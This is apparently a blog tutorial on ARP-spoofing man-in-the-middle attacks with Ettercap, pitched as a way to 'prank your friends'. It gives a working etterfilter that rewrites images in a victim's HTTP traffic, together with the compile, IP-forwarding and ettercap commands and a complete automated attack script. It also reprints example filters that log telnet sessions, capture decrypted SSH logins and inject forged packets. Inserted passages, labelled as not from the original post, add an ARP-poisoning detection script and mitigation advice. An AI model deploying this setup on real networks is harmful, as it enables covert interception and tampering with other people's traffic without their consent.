Ettercap - ARP Spoofing

Ettercap - ARP Spoofing Using Etterfilter to Replace Images or Other HTML tags and Syntax

Posted by Ivan Popovic on 29 Oct 2017


In this post we use ARP spoofing together with an Ettercap filter to replace some tags (images) in the pages a victim loads, just for fun or to prank your friends :)) . ARP spoofing is the building block: once the victim's traffic passes through the attacker's machine, it can be read, modified or dropped before it is forwarded.

Ettercap

Ettercap is a free and open source suite for man-in-the-middle attacks on a LAN. It works by putting the network interface into promiscuous mode and ARP poisoning the target machines. It features sniffing of live connections, content filtering on the fly and many other interesting tricks, supports active and passive dissection of many protocols (including encrypted ones) and includes many features for network and host analysis.

ARP SPOOFING

ARP (Address Resolution Protocol) spoofing, ARP cache poisoning, or ARP poison routing, is a technique by which an attacker sends (spoofed) Address Resolution Protocol (ARP) messages onto a local area network. Generally, the aim is to associate the attacker's MAC address with the IP address of another host, such as the default gateway, causing any traffic meant for that IP address to be sent to the attacker instead.

ARP spoofing may allow an attacker to intercept data frames on a network, modify the traffic, or stop all traffic. Often the attack is used as an opening for other attacks, such as denial of service, man in the middle, or session hijacking attacks.

The attack can only be used on networks that use the Address Resolution Protocol, and is limited to local network segments. The basic principle behind ARP spoofing is to exploit the vulnerabilities in the ARP protocol by sending spoofed ARP messages onto the LAN. ARP spoofing attacks can be run from a compromised host on the LAN, or from an attacker's machine that is connected directly to the target LAN.

Generally, the goal of the attack is to associate the attacker's host MAC address with the IP address of a target host, so that any traffic meant for the target host will be sent to the attacker's host. The attacker may choose to inspect the packets (spying), while forwarding the traffic to the actual default gateway to avoid discovery, modify the data before forwarding it (man-in-the-middle attack), or launch a denial-of-service attack by causing some or all of the packets on the network to be dropped.
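The defender-side check that follows from the description above, as an added example that is not part of the original post: a poisoned victim ends up with the attacker's MAC bound to the gateway's IP in its ARP cache, so the attacker's MAC appears twice in the neighbour table (once for its own IP, once for the gateway). The script parses the output of `ip -4 neigh show` on a Linux host and flags any MAC that claims several IPs, and checks the gateway against a MAC pinned in advance. The neighbour table below is constructed for the demo; on a live host pipe `ip -4 neigh show` into the functions instead.

```shell
#!/bin/sh
# Added example, not code from the original post: ARP-cache consistency checks for a
# Linux host, fed with the output of `ip -4 neigh show` (lines look like
#   192.168.1.1 dev eth0 lladdr 00:11:22:33:44:55 REACHABLE
# entries without a resolved MAC, e.g. "... FAILED", carry no lladdr field).

# Print every MAC bound to more than one IPv4 address, followed by the IPs it claims.
# Output format: "<mac>: <ip1> <ip2> ...", one line per shared MAC, sorted.
find_shared_macs() {
    awk '
        $0 ~ / lladdr / {
            for (i = 1; i <= NF; i++) if ($i == "lladdr") mac = tolower($(i+1))
            ips[mac] = ips[mac] " " $1
            n[mac]++
        }
        END { for (m in n) if (n[m] > 1) printf "%s:%s\n", m, ips[m] }
    ' | sort
}

# Return 0 if the gateway IP currently resolves to the pinned MAC, 1 otherwise
# (also 1 when the gateway is not in the table at all).
# Usage: check_gateway_mac <gateway-ip> <expected-mac> < neighbour-table
check_gateway_mac() {
    gw="$1"
    want=$(printf '%s' "$2" | tr 'A-Z' 'a-z')
    got=$(awk -v gw="$gw" '$1 == gw { for (i = 1; i <= NF; i++) if ($i == "lladdr") print tolower($(i+1)) }')
    [ -n "$got" ] && [ "$got" = "$want" ]
}

# Constructed sample: the attacker at 192.168.1.50 has poisoned the victim's entry
# for the gateway 192.168.1.1, so both IPs now map to the attacker's MAC.
SAMPLE_NEIGH='192.168.1.1 dev eth0 lladdr aa:bb:cc:dd:ee:ff REACHABLE
192.168.1.50 dev eth0 lladdr aa:bb:cc:dd:ee:ff STALE
192.168.1.20 dev eth0 lladdr 00:11:22:33:44:55 REACHABLE
192.168.1.99 dev eth0 FAILED'

# Demo run on the constructed table (live use: ip -4 neigh show | find_shared_macs)
printf '%s\n' "$SAMPLE_NEIGH" | find_shared_macs
if printf '%s\n' "$SAMPLE_NEIGH" | check_gateway_mac 192.168.1.1 00:11:22:33:44:55; then
    echo "gateway MAC matches the pinned value"
else
    echo "WARNING: gateway 192.168.1.1 does not resolve to the pinned MAC"
fi
```

A shared MAC is not proof on its own (some routers legitimately answer for several addresses), but a gateway whose MAC changed to one that also belongs to an ordinary host on the segment is the signature the attack above leaves behind; pinning the gateway MAC with a static ARP entry on sensitive hosts, or enabling dynamic ARP inspection on the switch, removes the condition the attack relies on.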

ETTERFILTER ?

The etterfilter utility compiles filter source files into binary filter files that the JIT interpreter in Ettercap's filter engine can execute. A filter must be compiled before Ettercap can load it. Syntax and parse errors are reported at compile time, so a filter that compiles is at least syntactically valid for Ettercap.

ARP SPOOFING Demos (Using EtterFilter)

In this demo we use ARP spoofing together with an Ettercap filter to replace some tags (images) in the pages a victim loads over plain HTTP, just for fun or to prank your friends :)) .

STEP 1 : Create a Custom Filter Script

First, create a new folder or directory to store our filter.


Open your favorite text editor and save the new file with a ".filter" extension.


Here is a custom filter script that replaces the img tags in an HTML page:

# Request side (victim -> server, port 80): mangle the Accept-Encoding header
# so the server answers with an uncompressed body; a gzip-compressed response
# would never contain the literal text "img src=" and the second rule would miss.
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
      msg("[*] Sucked Accept-Encoding!\n");
   }
}
# Response side (server -> victim, port 80): rewrite every "img src=" so the
# tag points at our image; the original URL stays behind as a stray attribute.
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"http://3.bp.blogspot.com/-PfUQyJkxonE/VuHd2m2N-zI/AAAAAAAAAnc/clq0g6rIHQ0/s1600-r/ironbugs-kusayang.png\" ");
   msg("[+] Replace tag launched\n");
} 

This script rewrites every img tag in the HTML that passes through, so that it points at the given URL. Two things to keep in mind: it only matches port 80, so pages served over HTTPS are untouched, and after the replacement the original image URL is left behind inside the tag (for example <img src="http://.../ironbugs-kusayang.png" "original.png">), which browsers ignore because the first src attribute wins. Save the file in the folder created above.


STEP 2 : Compile The Custom Script

To compile the custom filter script, use the following etterfilter command pattern :

etterfilter [filterscript.filter] -o [outputfilter.ef]


STEP 3 : Enable IP_Forward

Enable the ip_forward with the following command :

echo 1 > /proc/sys/net/ipv4/ip_forward

By default the value of ip_forward is '0' (disabled); make sure to change it to '1' (enabled), otherwise the victim's traffic stops at the attacker's machine and the victim loses connectivity instead of being silently proxied.


STEP 4 : Run Ettercap ARP Spoofing With Custom Etterfilter

ettercap -T -q -i [interface] -F [filter file] -M ARP /[Target IP]/ /[Gateway IP]/

If you want to ARP spoof every host on the network, you do not need to specify the targets.

Two notes on the command line: the /[IP]/ target form is the Ettercap 0.7 syntax (MAC/IPs/PORTs); Ettercap 0.8.x builds with IPv6 support expect MAC/IPs/IPv6/PORTs, i.e. /[Target IP]// and /[Gateway IP]//, and reject the two-slash form as having the wrong number of tokens. Also, when a victim and the gateway are given as the two targets, plain -M arp only sniffs traffic between those two hosts; to have the filter applied to the connections the victim makes through the gateway (which is where the web traffic goes), use -M arp:remote.

-T, run in text-only mode (CLI)
-q, quiet mode, display less verbose output (packet contents are not printed)
-i, interface name
-F, the compiled filter file to load
-M, the mitm method to use 
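The four steps above as one script, added here as an example; it is not the original post's code. It writes the same two filter rules with the image URL as a parameter, compiles them with etterfilter, enables IPv4 forwarding and restores the previous value on exit (the restore is an addition of this script), and runs ettercap with the 0.8.x target syntax and arp:remote. Paths, the run guard and the command-line helper are assumptions of this example.

```shell
#!/bin/sh
# Added example, not from the original post: the image-swap MITM as one script.
# Assumes Ettercap 0.8.x (target spec MAC/IPs/IPv6/PORTs) and a Linux host; the
# /tmp paths and the "run" guard at the bottom are choices of this example.

# Write the filter source; $1 = output path, $2 = URL of the replacement image.
write_filter() {
    cat > "$1" <<EOF
# request side: strip Accept-Encoding so the server answers uncompressed
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
      msg("[*] Zapped Accept-Encoding!\\n");
   }
}
# response side: point every img tag at our image
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\\"$2\\" ");
   msg("[+] Replace tag launched\\n");
}
EOF
}

# Build an Ettercap 0.8.x target spec for one IP; an empty IP means "every host".
target_spec() {
    printf '/%s//' "$1"
}

# Enable IPv4 forwarding in the sysctl file $1, remembering the old value and
# restoring it when the script exits (so the box does not stay a router).
enable_forwarding() {
    IPFWD_FILE="$1"
    IPFWD_OLD=$(cat "$IPFWD_FILE")
    trap 'printf "%s" "$IPFWD_OLD" > "$IPFWD_FILE"' EXIT INT TERM
    printf 1 > "$IPFWD_FILE"
}

# $1 = interface, $2 = victim IP, $3 = gateway IP, $4 = replacement image URL
run_mitm() {
    write_filter /tmp/swap.filter "$4"
    etterfilter /tmp/swap.filter -o /tmp/swap.ef || return 1
    enable_forwarding /proc/sys/net/ipv4/ip_forward
    # arp:remote so connections the victim makes through the gateway are filtered too
    ettercap -T -q -i "$1" -F /tmp/swap.ef -M arp:remote \
        "$(target_spec "$2")" "$(target_spec "$3")"
}

# Example invocation (values are placeholders): sh swap.sh run
if [ "${1:-}" = run ]; then
    run_mitm eth0 192.168.1.10 192.168.1.1 http://example.invalid/prank.png
fi
```

The filter is regenerated on every run, so the replacement URL can be changed without editing the source by hand; the trap restores ip_forward even when ettercap is interrupted with Ctrl-C, which the manual steps above do not do.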


Test the results: load a page over plain HTTP (not HTTPS) on the victim. Every image on the page should be replaced, and the ettercap console should print the msg() lines from the filter for each rewritten request and response.

Other custom filters

Below are further example filters (they are the ones shipped with Ettercap in etter.filter.examples). You can modify or combine them to build a more complex filter; lines starting with # are comments in the filter language.

# Display a message if the tcp port is 22
if (ip.proto == TCP) {
   if (tcp.src == 22 || tcp.dst == 22) {
      msg("SSH packet\n");
   }
}

# Log all telnet traffic, also execute ./program on every packet
if (ip.proto == TCP) {
   if (tcp.src == 23 || tcp.dst == 23) {
      log(DATA.data, "./logfile.log");
      exec("./program");
   }
}

# Log all traffic except http
if (ip.proto == TCP && tcp.src != 80 && tcp.dst != 80) {
   log(DATA.data, "./logfile.log");
}

# Some operation on the payload of the packet
if ( DATA.data + 20 == 0x4142 ) {
   DATA.data + 20 = 0x4243;
} else {
   DATA.data = "modified";
   DATA.data + 20 = 0x4445;
}

# Drop any packet containing "ettercap"
if (search(DECODED.data, "ettercap")) {
   msg("some one is talking about us...\n");
   drop();
   kill();
}

# Log ssh decrypted packets matching the regexp
if (ip.proto == TCP) {
   if (tcp.src == 22 || tcp.dst == 22) {
      if (regex(DECODED.data, ".*login.*")) {
         log(DECODED.data, "./decrypted_log");
      }
   }
}

# Dying packets
if (ip.ttl < 5) {
   msg("The packet will die soon\n");
}

# The same for IPv6 but make sure we really see IPv6 packets doing such trivial tests
if (eth.proto == IP6 && ipv6.hl < 5) {
   msg("The IPv6 packet will die soon\n");
}

# String comparison at a given offset
if (DATA.data + 40 == "ette") {
   log(DATA.data, "./logfile");
}

# Inject a file after a specific packet
if (tcp.src == 21 && search(DATA.data, "root")) {
   inject("./fake_response");
}

# Replace the entire packet with another
if (tcp.src == 23 && search(DATA.data, "microsoft")) {
   drop();
   inject("./fake_telnet");
}

# Modifying binary data by using external commands
if (udp.dst == 53 && pcre_regex(DATA.data, ".*\x03com\x00.*")) {
   log(DATA.data, "/tmp/payload");
   drop();
   execinject("/bin/sed 's/\x03com\x00/\x02my\x04page\x02de\x00/g' /tmp/payload");
   udp.len += 7;
   exec("/bin/rm /tmp/payload");
   msg("faked");
}

# Filter only a specific ip address
if (ip.src == '192.168.0.2') {
   drop();
}

# Do the same for IPv6
if (ipv6.src == '2001:db8::1') {
   drop();
}

# Combined both IPv4 and IPv6
if (eth.proto == IP && ip.dst == '192.168.0.2') {
   msg("drop IPv4");
   drop();
}
if (eth.proto == IP6 && ipv6.dst == '2001:db8::1') {
   msg("drop IPv6");
   drop();
}

# Translate the port of the tcp packet from 80 to 81
if (tcp.dst == 80) {
   tcp.dst -= 1;
   tcp.dst += 2;
}

# Identify and mangle ESP packets
if (ip.proto == ESP) {
   DATA.data = "DEADDECAF";
}